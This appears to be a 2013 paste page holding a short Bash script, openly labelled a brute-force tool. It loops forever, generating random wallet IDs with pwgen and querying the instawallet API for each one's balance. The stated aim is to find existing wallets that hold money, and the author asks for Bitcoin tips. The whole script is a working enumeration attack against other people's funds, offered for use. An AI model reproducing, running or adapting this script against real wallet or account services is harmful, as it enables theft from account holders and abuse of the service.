instawallet API brute force script


SUBMITTED BY: Guest

DATE: March 28, 2013, 2:29 a.m.

FORMAT: Bash

SIZE: 790 Bytes

HITS: 1420

  1. Here is a script that will generate potential wallet ID's and run them against the instawallet API :)
  2. Most of your results will look like this...
  3. h31JB5T3ib47A8zDppauSHUnHUhVUoPLL = {"successful":false,"message":"The API is currently unavailable.","message_code":1}
  4. It simply means the wallet hasn't been created yet so there cant' be
  5. anything in it anyways. If it exists, it will return the value of the wallet. All tips go to
  6. 1HQnXb8jaQKzx9PPYFSv7HUBkvNe5ENfjS
  7. Make sure you have pwgen installed!
  8. Thanks :)
  9. #!/bin/bash
  10. while :; do
  11. wallet=`pwgen -1 -n 33 -s`;
  12. balance=`wget -q -O /dev/stdout https://www.instawallet.org/api/v1/w/$wallet/balance`;
  13. echo "$wallet = $balance";
  14. done

comments powered by Disqus